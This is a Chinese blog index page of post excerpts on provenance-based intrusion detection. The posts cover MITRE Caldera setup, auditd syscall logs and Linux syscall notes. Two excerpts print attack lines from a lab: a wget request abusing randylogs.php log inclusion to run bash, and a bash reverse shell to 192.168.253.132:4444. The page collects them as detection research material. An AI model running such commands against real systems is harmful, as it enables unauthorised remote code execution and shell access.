文章分类 -  PIDS入侵检测

22-25主要学习
摘要:项目了解 mitre/caldera:自动对手仿真平台 (github.com) Caldera 读音 :美 /kɔl'dɪərə/ n. 破火山口;火山喷口 它建立在 MITRE ATT&CK™ 框架之上,是 MITRE 的一个活跃研究项目。 MITRE Caldera™ 是一个网络安全平台,旨在 阅读全文
posted @ 2025-02-27 16:57 zzl14 阅读(909) 评论(0) 推荐(0)
摘要:安装 git clone https://github.com/mitre/caldera.git --recursive (有一些子模块,需要递归下载) 由于本机安装有一些条件约束。 https://www.cnblogs.com/zzl14/articles/18302481 安装python3 阅读全文
posted @ 2025-02-27 16:52 zzl14 阅读(126) 评论(0) 推荐(0)
摘要:日志 type=SYSCALL msg=audit(1715262316.495:210491): arch=c000003e syscall=84 success=yes exit=0 a0=55c925c93820 a1=0 a2=7fe3072afc00 a3=100 items=2 ppid 阅读全文
posted @ 2024-05-23 22:47 zzl14 阅读(38) 评论(0) 推荐(0)
摘要:日志 type=SYSCALL msg=audit(1715262278.380:160553): arch=c000003e syscall=83 success=yes exit=0 a0=55c925c8e8a0 a1=1ed a2=0 a3=0 items=2 ppid=0 pid=1 au 阅读全文
posted @ 2024-05-23 22:23 zzl14 阅读(98) 评论(0) 推荐(0)
摘要:1. 网络连接建立前都会通过 socket系统调用,建立一个新的FD,只说明了类型。 socket() 系统调用创建一个套接字。 int socket(int domain, int type, int protocol); 返回的是int 表示 文件描述符号 这个套接字通常是(domain)指定为 阅读全文
posted @ 2024-05-21 23:05 zzl14 阅读(56) 评论(0) 推荐(0)
摘要:日志 exit type=SYSCALL msg=audit(1716278384.251:15840): arch=c000003e syscall=60 a0=0 a1=3b000 a2=3c a3=200 items=0 ppid=1514 pid=153800 auid=1000 uid=1 阅读全文
posted @ 2024-05-21 16:08 zzl14 阅读(254) 评论(0) 推荐(0)
摘要:攻击脚本: 1.攻击的过程,等待访问此链接 wget -q -O /dev/null "http://192.168.253.131/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=%2fbin%2fbash+-c+%22bas 阅读全文
posted @ 2024-05-09 20:55 zzl14 阅读(24) 评论(0) 推荐(0)
摘要:日志 type=SYSCALL msg=audit(1714980638.367:4664): arch=c000003e syscall=3 success=yes exit=0 a0=7 a1=555fd3ee57c7 a2=7fff2a116780 a3=555fd3ee57c7 items= 阅读全文
posted @ 2024-05-06 23:13 zzl14 阅读(50) 评论(0) 推荐(0)
摘要:clone日志 type=SYSCALL msg=audit(1714980638.367:4663): arch=c000003e syscall=56 success=yes exit=2580 a0=1200011 a1=0 a2=0 a3=7fdca0ac7bd0 items=0 ppid= 阅读全文
posted @ 2024-05-06 22:54 zzl14 阅读(129) 评论(0) 推荐(0)
摘要:日志 type=SYSCALL msg=audit(1714980638.367:4662): arch=c000003e syscall=43 success=yes exit=5 a0=3 a1=7fff2a116900 a2=7fff2a1168bc a3=0 items=0 ppid=1 p 阅读全文
posted @ 2024-05-06 20:54 zzl14 阅读(38) 评论(0) 推荐(0)
摘要:日志 connect /bin/bash -c bash -i >& /dev/tcp/192.168.253.132/4444 0>&1 type=SYSCALL msg=audit(1715087506.355:19840): arch=c000003e syscall=42 success=y 阅读全文
posted @ 2024-04-25 23:44 zzl14 阅读(107) 评论(0) 推荐(0)
摘要:openat日志 open type=SYSCALL msg=audit(1710904082.640:49873): arch=c000003e syscall=2 success=yes exit=3 a0=5555567f3e40 a1=280800 a2=0 a3=0 items=1 ppi 阅读全文
posted @ 2024-04-24 16:35 zzl14 阅读(267) 评论(0) 推荐(0)
摘要:open(2) - Linux manual page (man7.org) open Standard C library (libc, -lc) int open(const char *pathname, int flags, ... /* mode_t mode */ ); 功能: open 阅读全文
posted @ 2024-04-08 11:26 zzl14 阅读(160) 评论(0) 推荐(0)